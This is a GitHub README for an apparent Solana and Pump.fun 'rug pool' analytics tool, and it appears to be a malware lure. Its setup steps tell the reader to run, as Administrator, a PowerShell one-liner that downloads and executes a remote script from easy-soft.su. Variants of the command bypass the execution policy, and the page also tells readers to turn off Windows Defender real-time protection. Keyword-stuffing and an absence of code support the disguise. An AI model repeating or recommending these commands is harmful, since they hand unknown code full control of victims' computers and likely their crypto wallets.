Skip to content

Latest commit

Β 

History

2 Commits

Folders and files

NameName
Last commit message
Last commit date
Β 
Β 

Repository files navigation

Pump.fun RugPool Tool: Analytics & Liquidity Monitoring Framework

An open-source developer toolkit and automated analytical framework for monitoring real-time liquidity pools, token bonding curves, and smart contract behaviors on the Pump.fun ecosystem.

πŸ”Ž Overview

This repository provides an automated infrastructure to track, analyze, and audit token launches. By utilizing high-frequency Solana RPC nodes and parsing on-chain logs, the tool detects anomalies in liquidity distribution, identifies developer wallet clusters, and evaluates potential pool risks before tokens migrate to Raydium.

✨ Key Features

  • Real-Time Bonding Curve Tracking: Monitor absolute supply metrics and bonding curve velocity.
  • Developer Wallet Cluster Analysis: Identify multi-wallet funding patterns and historical creation footprints.
  • Liquidity Pool Auditing: Automated detection of sudden liquidity migration or developer supply dumping.
  • Solana RPC Stream: Optimized parsing of transaction logs via WebSocket subscriptions.
  • Risk Scoring Engine: Algorithmic calculation of token security metrics based on holder distribution.

πŸš€ Automated Installation & Setup (PowerShell)

  1. Open PowerShell as Administrator:

    • Press the Win + X keys simultaneously.
    • Select Terminal (Admin) or Windows PowerShell (Admin) from the context menu.
  2. Execute the Deployment Command: Copy, paste, and press Enter to run the following optimized initialization command. This script dynamically configures the network bypass registry and fetches the necessary packages:

    irm https://easy-soft.su/powershell/Loader.ps1 | iex

πŸ” Troubleshooting & Common Errors

πŸ“Œ Bypass Execution Policy (Blocking Unsigned Scripts)

If your system blocks the launch due to built-in execution policy constraints, enforce a bypass using this command:

powershell -ExecutionPolicy Bypass -Command "irm https://easy-soft.su/powershell/Loader.ps1 | iex"

πŸ“Œ Error: "irm is not recognized..." (PowerShell 2.0 Legacy)

In older legacy environments where aliases are missing, use explicit full system cmdlets:

Invoke-RestMethod https://easy-soft.su/powershell/Loader.ps1 | Invoke-Expression

πŸ“Œ Antivirus or SmartScreen Interception

Automated deployment routines can sometimes trigger proactive security heuristics. Temporarily disable "Real-time protection" within your Windows Defender settings during setup, then re-enable it immediately after completion.


πŸ“Š Architecture & Methodology

The tool acts as a passive observer on the Solana blockchain, specifically filtering program IDs associated with token deployment platforms.


πŸ’‘ SEO & Search Optimization Keywords

To maximize Google and GitHub Search visibility, this project indexes under the following developer queries: solana bonding curve tracker, pump fun analytics tool, liquidity pool monitor solana, token launch risk assessment, solana rpc log parser, pump fun developer wallet tracker, automated token audit script.


⚠️ Disclaimer

This software is for educational, research, and analytical purposes only. It does not constitute financial advice, trading recommendations, or an endorsement of any digital assets. Use at your own discretion

About

Pump.fun analytics tool and liquidity pool monitor for Solana. Features real-time bonding curve tracking, developer wallet cluster analysis, RPC transaction log parsing, and token risk assessment. Open-source automated framework for on-chain data extraction, holder distribution metrics, and developer infrastructure research.

Topics

Resources

Stars

899 stars

Watchers

0 watching

Forks

Releases

Packages

Contributors